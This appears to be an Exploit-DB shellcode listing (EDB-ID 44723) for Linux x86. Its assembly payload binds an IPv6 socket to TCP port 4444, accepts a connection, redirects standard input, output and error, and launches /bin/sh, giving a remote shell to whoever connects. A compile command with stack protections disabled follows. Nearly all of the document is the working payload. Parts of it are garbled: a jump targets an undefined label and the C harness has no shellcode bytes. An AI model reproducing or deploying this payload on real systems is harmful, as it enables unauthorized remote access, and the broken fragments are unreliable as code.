Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)

EDB-ID: 44723
Author: Matteo Malvica
Published: 2018-05-23
Type: Shellcode
Platform: Linux_x86
Shellcode: Download Shellcode Code Download / View Raw
Shellcode Size: 113 bytes

 // # Length : 113 bytes 
// # Author : Matteo Malvica
// # Tested On : kali linux 4.15
// # Contact : [email protected]
// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444


global _start
section .text


;; ipv6 socket creation
push 0x6 ; protocol IPv6
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6
xor eax,eax ; zero out eax
xor ebx,ebx ; zero out ebx
mov al,0x66 ; syscall: sys_socketcall + cleanup eax register
inc ebx ; 1 = SYS_socket
mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
int 0x80
mov esi,eax ; saves socket descriptor
xor eax,eax

push DWORD eax ;ipv6 loopback pushed as x4 dword
push DWORD eax
push DWORD eax
push DWORD eax
push DWORD eax ;sin6_addr
push WORD 0x5c11 ;port 4444
push WORD 0x0a ;AF_INET6
mov ecx,esp
push 0x1c
push ecx
push esi
dec ebx
mov bl,0x2
mov ecx,esp
mov al,0x66
int 80h

xor eax,eax
xor ebx,ebx
push byte 0x2
push esi
mov ecx,esp
mov bl,0x4
mov al,0x66
int 80h

xor ebx,ebx
push ebx
push ebx
push esi
mul ebx
mov bl,0x5
mov al,0x66
mov ecx,esp
int 80h

sub ecx, ecx
mov cl, 0x2 ;initiate counter
xchg ebx,eax ;save clientfd

; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
mov al, 0x3f ;syscall: sys_dup2
int 0x80 ;exec sys_dup2
dec ecx ;decrement loop-counter
jns loop2 ;as long as SF is not set -> jmp to loop

xor edx,edx
push edx ;null terminated /bin//sh
push 0x68732f2f ;"hs//"
push 0x6e69622f ;"nib/"
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b ;execve()
int 0x80


to compile the shellcode

$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode


#include <stdio.h>

unsigned char shellcode[] = \

printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;

Related Posts